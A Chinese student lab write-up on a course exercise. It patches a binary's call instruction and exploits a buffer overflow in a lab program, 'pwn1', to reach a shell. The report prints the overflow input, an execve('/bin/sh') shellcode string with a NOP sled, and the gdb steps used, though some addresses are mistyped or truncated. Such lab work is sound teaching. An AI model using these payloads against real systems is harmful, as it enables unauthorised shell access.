实验一 PC平台逆向破解

实验目的

• 本次实践的对象是一个名为pwn1的linux可执行文件。

• 该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

• 该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

实验内容

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
• 注入一个自己制作的shellcode并运行这段shellcode。

相关内容机器码

• NOP：NOP指令即“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。（机器码：90）
• JNE：条件转移指令，如果不相等则跳转。（机器码：75）
• JE：条件转移指令，如果相等则跳转。（机器码：74）
• JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）
• CMP：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

实验步骤

（一）直接修改程序机器指令，改变程序执行流程

• 创建文件夹20165234_exp1 ，将pwn1放入其中

• 使用 objdump -d pwn1 将pwn1反汇编，得到以下代码

其中 80484b5: e8 d7 ff ff ff call 8048491 <foo> 这条汇编指令，e8表示“ call ”，在main函数中调用位于地址 8048491 处的foo函数。

如果想函数调用getShell，只需要修改 d7 ff ff ff 即可。

根据foo函数与getShell地址的偏移量，用Windows计算器通过 47d-4ba 就能得到补码，可计算出应为 c3 ff ff ff 。

修改可执行文件的具体步骤

• 输入命令  cp pwn1 pwn2 对pwn1中的内容进行拷贝至pwn2
• 用 vi 打开pwn2，进入命令模式，输入: %!xxd 将显示模式切换为十六进制
• 在底行模式输入 /d7 定位需要修改的地方，并确认
• 进入插入模式，修改 d7 为 c3
• 输入: %!xxd -r 将十六进制转换为原格式
• 使用 :wq 保存并退出

在此我选择尝试另一种方式，即使用图形化的16进制编程器：

输入 apt-get install wxhexeditor ， wxHexEditor 两个命令即可安装

通过此工具也查找到了要修改的内容，修改D7为C3，然后保存并退出

输入  objdump -d pwn2 | more  反汇编pwn2文件中的main函数，查看是否正确调用get shell函数

运行修改后的代码，可以得到shell提示符#。

修改成功，调用了getshell~

（二）通过构造输入参数，造成BOF攻击

1.确认输入字符串哪几个字符会覆盖到返回地址

• 通过gdb命令，调试文件pwn1。
• 输入 1111111122222222333333334444444455555555 ，出现Segmentation Fault，说明缓冲区溢出。

通过 info r 命令查看当前寄存器状态，发现EIP寄存器被0x35353535覆盖，即当前返回地址为5555（0x35是ASCII码，代表十进制中的5）

说明刚输入的40个字符中，含有5的字符串溢出到了EIP中。

• 输入字符串 1111111122222222333333334444444412345678 ，结果发现1234这四个数最终会覆盖到堆栈上的返回地址

只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell。

2.确认用什么值来覆盖返回地址

由反汇编结果可知getShell的内存地址为：0x080484

确认字节序后，应该输入11111111222222223333333344444444\x7d\x84\x04\x08

3.构造输入字符串

• 使用 perl 命令生成包括这样字符串的一个文件。其中 \x0a 表示回车。

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

• 使用16进制查看指令xxd， 通过 xxd input 查看input文件的内容。

• 将input输入通过管道符“|”作为输入，指令为 (cat input ) | ./pwn1 ，运行后就进入了getShell函数~

（三）注入Shellcode并执行

shellcode

shellcode就是一段机器指令（code），通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe），所以这段机器指令被称为shellcode。在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

1.准备工作

首先使用 apt-get install execstack 命令安装 execstack 。

然后修改一些设置。

2.构造要注入的payload

Linux下有两种基本构造攻击buf的方法：retaddr+nop+shellcode、nop+shellcode+retaddr。

缓冲区小就用前一种方法，缓冲区大就用后一种方法。

这里我们选择前一种方法，即retaddr+nops+shellcode结构来攻击buf，在shellcode前填充nop的机器码90，最前面加上加上返回地址（先定义为\x4\x3\x2\x1）

• 执行以下指令：

perl -e 'print
"\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"'
> input_shellcode

• 为了确定\x4\x3\x2\x1该填什么，首先打开一个终端，使用指令(cat input_shellcode;cat) | ./pwn1注入这段攻击buf。
• 再打开另外一个终端，使用指令 ps -ef | grep pwn1 查看pwn1这个进程，发现进程号为16262。

• 接下来用gdb来调试pwn1这个进程。输入命令disassemble foo ，通过设置断点来查看注入buf的内存地址。
• 使用 break *0x080484ae 设置断点，并输入 c 继续运行。在pwn1进程正在运行的终端敲回车，使其继续执行。再返回调试终端，使用 info r esp 查找地址。

x/16x 0xbffffd37c 查看其存放内容，看到了0x9080cd0b，就是返回地址的位置。

实验收获

通过本次实验，理解了缓冲区溢出攻击的具体原理，实际的操作中从程序内部函数的跳转到最后的shellcode注入一系列流程。由于我的基础较薄弱，对于汇编语言和Linux操作的知识并不是很熟悉，而此次实验让我熟悉了相关的知识，并为以后的实验打下了基础。通过查看老师的教程，上网查阅资料，参考同学的博客等方式，我还是较为顺利地完成了实验，并且充分了解了相关的原理。总体来说，我的收获很大~

什么是漏洞？

漏洞就是某种安全隐患，比如说操作系统、硬件、软件等等，其中多少会存在不同的安全隐患，而且可以被他人利用。

漏洞的危害小则影响个人，可能会造成个人隐私信息的泄露，乃至引起经济损失；

大则可以引起整个国家的严重损失，可能泄露国家秘密信息，危害国家安全。